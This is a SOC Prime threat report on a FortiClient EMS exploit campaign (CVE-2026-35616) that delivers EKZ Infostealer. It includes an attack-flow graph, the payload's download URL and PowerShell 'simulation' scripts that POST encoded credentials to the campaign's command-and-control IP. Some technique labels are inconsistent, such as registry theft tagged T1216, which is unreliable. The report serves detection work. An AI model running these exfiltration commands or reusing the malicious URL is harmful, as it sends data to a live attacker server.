FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime Team

FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Arctic Wolf identified a campaign that exploited CVE-2026-35616 in FortiClient EMS to distribute a malicious PowerShell script to managed endpoints. That script retrieved and launched a credential-stealing payload known as EKZ Infostealer while posing as a legitimate Fortinet patch. The malware collected browser passwords, cookies, and autofill information, then exfiltrated the stolen data over HTTP. By abusing trusted EMS configuration channels, the attackers were able to execute the payload quickly across multiple managed devices.

Investigation

Researchers recreated the exploit by sending specially crafted unauthenticated HTTP requests to FortiClient EMS APIs, resulting in configuration changes that inserted malicious scripts. Execution traces showed fortitray.exe or ipsec.exe spawning cmd.exe, which in turn launched a Base64-encoded PowerShell command that downloaded p.exe from a malicious IP address. The payload wrote a log.txt file to ProgramData, sent the captured data back to the same server, and then deleted itself.

Mitigation

Organizations should update FortiClient EMS to a version that fixes CVE-2026-35616 and restrict API access to approved source IP addresses. Defenders should also review EMS logs for certificate-related errors and unexpected changes to Remote Access Profiles. Outbound HTTP traffic from endpoints to unknown IP addresses should be blocked, and script execution within VPN profile workflows should be limited through least-privilege controls.

Response

If this activity is detected, isolate affected hosts immediately, revoke any unauthorized EMS accounts that may have been created, and remove malicious script files from the FortiClient logs directory. Investigators should preserve the log.txt artifact, calculate hashes for the malicious binaries, and hunt for matching indicators across the environment. Exposed browser credentials should be reset, and teams should monitor for suspicious authentication activity that may follow the theft.

"graph TB %% Class definitions classDef action fill:#99ccff classDef process fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef file fill:#ccffcc classDef technique fill:#ddeeff %% Nodes action_initial_access["Action – T1190 Exploit Public-Facing Application CVEu20112026u201135616 in FortiClient EMS API"] class action_initial_access action process_api_requests["Process – Unauthenticated API requests processed as privileged admin actions"] class process_api_requests process action_cmd_launch["Action – T1059.003 Windows Command Shell fortitray.exe & ipsec.exe launch cmd.exe"] class action_cmd_launch action action_powershell["Action – T1059.001 PowerShell Base64u2011encoded PowerShell script execution"] class action_powershell action technique_obfuscation["Technique – T1027 Obfuscated Files or Information Payload delivered as base64"] class technique_obfuscation technique technique_decode["Technique – T1140 Deobfuscate/Decode Files or Information Runtime base64 decoding"] class technique_decode technique action_download["Action – T1570 Lateral Tool Transfer Download FortiEndpoint_Patch.exe (p.exe)"] class action_download action file_payload["File – FortiEndpoint_Patch.exe (p.exe) Hosted at http://83.138.53.110/dl/p.exe"] class file_payload file action_execute["Action – T1203 Exploitation for Client Execution Silent execution of downloaded binary"] class action_execute action malware_infostealer["Malware – EKZ Infostealer Collects credentials, cookies, autofill data"] class malware_infostealer malware technique_cred_access["Technique – T1555.003 Credentials from Web Browsers"] class technique_cred_access technique file_log["File – C:\ProgramData\log.txt Collected data storage"] class file_log file action_exfil["Action – T1567 Exfiltration Over Web Service HTTP POST to attacker server"] class action_exfil action action_cleanup["Action – T1564 Hide Artifacts Delete malicious files and log"] class action_cleanup action %% Connections action_initial_access –>|leads_to| process_api_requests process_api_requests –>|triggers| action_cmd_launch action_cmd_launch –>|executes| action_powershell action_powershell –>|uses| technique_obfuscation technique_obfuscation –>|requires| technique_decode action_powershell –>|downloads| action_download action_download –>|retrieves| file_payload file_payload –>|executed_by| action_execute action_execute –>|runs| malware_infostealer malware_infostealer –>|performs| technique_cred_access malware_infostealer –>|writes| file_log file_log –>|sent_by| action_exfil action_exfil –>|followed_by| action_cleanup action_cleanup –>|deletes| file_payload action_cleanup –>|deletes| file_log "

Attack Flow

Attack Narrative & Commands:
The attacker has previously harvested credentials from the Windows registry (T1216 family) using EKZ Infostealer. To exfiltrate the collected blob, the malware launches a PowerShell one‑liner that POSTs the Base64‑encoded credentials to its command‑and‑control server at 83.138.53.110. The use of PowerShell (Invoke-WebRequest) is a classic living‑off‑the‑land technique that evades binary‑based detections while still producing network telemetry observable by the firewall.
```
```powershell
# Simulated credential payload (Base64 of "user:pass")
$payload = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("administrator:Password123!"))
$uri = "http://83.138.53.110/collect"
Invoke-WebRequest -Uri $uri -Method POST -Body $payload -ContentType "application/x-www-form-urlencoded"
```
```

Regression Test Script: This self‑contained PowerShell script reproduces the exfiltration step and can be rerun for future regressions.

```powershell
<#
.SYNOPSIS
    EKZ Infostealer credential exfiltration simulation (HTTP POST).

.DESCRIPTION
    Generates a fake credential blob, encodes it, and POSTs it to the
    known malicious IP used in the detection rule.

.NOTES
    Requires outbound HTTP allowed to 83.138.53.110 on port 80.
#>

# ---- Preparation ----
$creds   = "admin_user:SuperSecret!"
$b64     = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($creds))
$target  = "http://83.138.53.110/collect"

# ---- Execution ----
try {
    Write-Host "[*] Sending credential blob to $target ..."
    $resp = Invoke-WebRequest -Uri $target -Method POST -Body $b64 -ContentType "application/x-www-form-urlencoded" -UseBasicParsing
    Write-Host "[+] HTTP Status:" $resp.StatusCode
} catch {
    Write-Error "[-] POST failed: $_"
}

# ---- End of script ----
```

Cleanup Commands: No persistent artifacts are created on disk, but to be thorough we close any lingering web request sessions and clear the PowerShell variable.

```powershell
# Cleanup variables and close any open web sessions
Remove-Variable -Name creds,b64,target -ErrorAction SilentlyContinue
if (Get-Command -Name Remove-WebRequestSession -ErrorAction SilentlyContinue) {
    Remove-WebRequestSession -All
}
Write-Host "[*] Cleanup complete."
```

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free